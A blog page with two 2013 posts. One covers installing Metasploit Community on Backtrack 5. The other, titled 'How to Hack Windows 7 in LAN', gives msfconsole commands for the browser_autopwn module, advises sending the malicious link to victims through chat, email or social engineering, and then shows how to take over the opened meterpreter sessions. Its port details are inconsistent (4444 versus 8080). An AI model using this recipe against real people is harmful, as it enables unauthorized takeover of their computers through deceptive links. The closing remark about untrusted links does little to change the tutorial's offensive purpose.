Cyber Survivals

Showing posts with label Metasploit. Show all posts
Showing posts with label Metasploit. Show all posts

Saturday, 6 April 2013

Installing Metasploit Community Edition on Backtrack 5 R3

Backtrack 5 comes with pre-installed  metasploit framework v4.0 but now Metasploit Community comes with updated  Web Ui version and others functionalities and even more expolits.

Now the current available version is Metasploit framework v4.5 which can be easily downloadable

To download Metasploit Framework Download  

Step1: Download latest Metasploit framework installer from above link

Step2: Installing Metasploit Community over the existing metasploit framework installation won't work for several reasons, one being the postgres cdatabase conflict.
The best way to start by uninstalling the earlier version of Metasploit Framework first and comes to the metasploit directory and uninstall using below commands.

# cd /opt/metasploit/
# ls
# ./uninstall

Step3: Make installer executable

When download has completed with file name "metasploit-latest-linux-installer.run". open new terminal window and enter the following commands.

# chmod u+x /root/metasploit-latest-linux-installer.run

Step4: Run Installer

# ./metasploit-latest-linux-installer.run


At the end of the installer, the metasploit web Ui open in your browser (https://localhost:3790/) in follow the steps to register and choose the metasploit community edition for free and now you have to give the licence key for the community edition, which you received on your mail which you registered.



 Step 5: open msfconsole and update

# msfconsole
#  sudo msfupdate




Saturday, 30 March 2013

How to Hack Windows 7 in LAN using Metaspolit (Metasploit Browser Autopwn)




In nowdays due to firewall restrictions and patch management policies exploitation of systems become more difficult .However one of the most efficient way to use of client side attacks.


Browser Autopwn is one of the client side attack. Here we will examine the effectiveness of the Metasploit Browser Autopwn Module.


The Basic Idea behind that module is that it creates a web server in our local machine which will contain different kind of browser exploits. When the user will open the malicious link then the execution of the exploits will start against the browser of the user and if one of the exploits is successful a meterpreter session will open.


Set up Required


Attacker: Backtrack 5

Victim: Windows 7


Step 1:Open Backtrack terminal and type msfconsole

Step 2: Now type use auxiliary/server/browser_autopwn

Step 3: Now set LHOST, PORT, URIPATH

msf auxiliary(browser_autopwn) > set lhost 192.168.5.236

msf auxiliary(browser_autopwn)> set port 4444 (you can use port 80 also) 
msf auxiliary(browser_autopwn) > set uripath / 
msf auxiliary(browser_autopwn) > exploit

Send the link of the server to the victim via chat or email or any social engineering technique.


http://192.168.5.236:8080

You now have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID
 
Conclusion

Most of the organizations are behind proxy firewalls so only the port 80 is allowed and many employees are using social networks these days. An attacker can exploit that and send  malicious link to user through social networks to users. So, Metasploit  Browser Autopwn Module is the proof of how dangerous is to open links that are coming from untrusted sources.